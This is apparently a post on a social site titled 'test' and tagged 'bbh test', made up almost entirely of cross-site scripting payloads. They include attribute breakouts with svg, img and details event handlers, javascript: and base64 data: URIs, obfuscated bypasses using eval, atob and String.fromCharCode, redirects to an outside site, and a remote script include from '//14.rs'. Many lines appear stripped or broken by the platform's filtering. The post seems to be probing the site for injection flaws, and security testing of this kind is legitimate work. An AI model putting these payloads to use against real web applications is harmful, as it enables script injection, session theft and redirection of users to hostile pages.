test

avatar

Direct Execution Payloads
"><svg/onload=alert('XSS_SVG')>

"><img src=x onerror=alert('XSS_Image')>

"><details open ontoggle=alert('XSS_Details')>

">

"><audio src=x onerror=alert('XSS_Audio')>

"><input autofocus onfocus=alert('XSS_Focus')>

">

(Unsupported javascript:alert('XSS_Iframe'))

"><marquee onstart=alert('XSS_Marquee')>

"><body onload=alert('XSS_Body')>

Redirect & Protocol Bypasses
">

"><svg/onload="location.replace('https://x.com')">

">Click Me

">

">

(Unsupported data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTX0Jhc2U2NCcpPC9zY3JpcHQ+)

Obfuscation & Filter Bypasses
">

">

"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>

">

">

">Click

Markdown & Attribute Breaks
[XSS](javascript:alert('XSS_Markdown'))

XSS

"onmouseover="alert('XSS_Hover')

"style="width:1000px;height:1000px"onmouseover="alert('XSS_Overlay')

<details/open/ontoggle="new(Function)('al'+'ert(1)')()">

<svg/onload='document["location"]="https://x.com"'>

















<button/formaction=javascript:alert(1)>XSS

(Unsupported undefined)

<svg/onload="window'al'+'ert'">

Click

Hover

"><svg / onload = "alert('XSS_Whitespace')">

"><img/src="x"/onerror="alert('XSS_Slash')">

"><svg/onload=alert('XSS_Equal_Entity')>

"><details/open/ontoggle="alert('XSS_Toggle_Entity')">

"><iframe/src="javascrent:alert(1)">

" ><a/href="javascript:confirm('XSS_Link')">Click

" >

" >Click_Math

" >

Click_Form

" ><isindex type=image src=1 onerror=alert('XSS_Isindex')>

"><svg/onload="top'al\x65rt'">

">

"><svg/onload="setTimeout('ale'+'rt(1)')">

">

"><svg/onload="Function('ale'+'rt(1)')()">

" >

" ><svg/onload="document.location='https://x.com'">

" ><iframe/onload="this.contentWindow.location.href='https://x.com'">

" ><details/open/ontoggle="location='https://x.com'">

" ><marquee/onstart="location.assign('https://x.com')">

" />

" ><img src=x onerror=alert('Breakout_2')>

" ><svg/onload=alert('Breakout_3')>

" >

<svg/onload=alert(1)>

(Unsupported javascript:alert(1))

XSS

<svg/onload="window'alert'">

<svg/onload="window'al'+'ert'">

<svg/onload="eval('ale'+'rt(1)')">

XSS
XSS
XSS
XSS
XSS
XSS
XSS

<p/onmouseover="alert(1)">XSS

<b/onmouseover="alert(1)">XSS

<i/onmouseover="alert(1)">XSS

<u/onmouseover="alert(1)">XSS

XSS
XSS XSS XSS

<svg/onload="top'al\x65rt'">

<svg/onload="this'al\x65rt'">

<svg/onload="parent'al\x65rt'">

<svg/onload="frames'al\x65rt'">

<svg/onload="self'al\x65rt'">

<svg/onload="[1].map(alert)">

<svg/onload="[1].forEach(alert)">

<svg/onload="String.prototype.indexOf.call('a', {toString:alert})">

">

"><script src=//14.rs>

">

">

"><svg/onload=prompt(1)>

"><svg/onload=confirm(1)>

"><details/open/ontoggle=prompt(1)>

"><video/poster=x/onerror=alert(1)>

"><audio/src=x/onerror=alert(1)>

">

">

"><svg/onload=eval(atob('YWxlcnQoMSk='))>

">

">

">

">

"><xss/style="behavior:url(#default#time2)"/onbegin="alert(1)">

"><vmlframe/src="javascript:alert(1)">

">

bbh test
0
0
0.000
0 comments